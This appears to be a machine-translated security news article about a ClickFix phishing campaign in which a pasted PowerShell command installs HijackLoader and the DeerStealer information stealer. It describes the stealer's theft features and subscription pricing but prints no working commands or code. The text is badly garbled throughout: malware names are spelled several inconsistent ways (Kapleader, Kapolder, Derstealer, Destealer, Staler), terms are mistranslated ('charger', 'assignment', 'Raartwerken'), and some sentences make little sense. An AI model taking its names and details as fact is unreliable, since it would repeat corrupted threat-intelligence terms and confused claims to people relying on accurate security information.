A new wave of cyber attacks in which Kapleader and the Staler are involved has been observed by researchers from cyber security who use phishing tactics to lure victims to perform malignant commands.
According to the Esentire’s Threat Response Unit (Tru), which discovered the campaign, the clickfix uses the initial access vector.
Victims are forwarded to a phishing page that encourages them to perform a PowerShell assignment via the Windows Run -Prompt. This assignment downloads an installation program called NOW.MSI, which launches a series of actions that comes from the performance of Kapolder and release of the Derstealer -Payload.
Esentire said that HIJackloader has been active since 2023 and is known for the use of Steganography, in particular hidden configuration data in PNG images.
Once performed, the charger makes legitimate binary files to perform non -signed malignant code, so that it is ultimately injected into the memory.
The expansive theft options of Derstealer
Destealer, also launched as Xfiles Spyware on Dark-Web Forums by a user called Luciferxiles, is a subscription-based informationer with functions that go much further than theft of the basic references.
The malware:
-
Extracts data from more than 50 web browsers
-
Kaping 14+ Cryptocurrency portion Types via clipboard surveillance
-
Harvest login details of messengers, FTP, VPN, E -mail and gaming clients
-
Including hidden VNC for stealthy external access
-
Used encrypted HTTPS channels for command-and-control (C2) communication
The malware also contains modular obfuscation and virtual machines to decode strings, which impedes traditional analysis techniques.
Read more about Malware charger techniques: Coffeeloader Malware loader linked to Smokeloader -Raartwerken
Command Line Trickery
The attack starts with the user who unconsciously carries out a coded assignment that achieves the installation program.
Although the installation program uses a signed binary from Comodo, it loads a manipulated DLL to hijack the performance. This eventually changed the DLL decoding the next phase, which Derstealer injects into another legitimate process.
Despite public tools that are available to decode the configuration of Hijackloader, attackers continue to use the same methods, which indicates ignorance or contempt for detection risks.
Expansion of threat, evolving tools
Esentire warned that Derstealer is constantly evolving, with upcoming functions with macOS support, AI-driven improvements and additional client goals.
Threats actors that subscribe to higher price strokes to $ 3000 per month reception extras such as repodes, payload signs and advanced adjustment.
As these tools become more advanced, defenders must remain alert.
The Tru van Esentire recommends continuous threat monitoring and updating end point protection mechanisms to detect emerging chargers and stealers before damage is caused.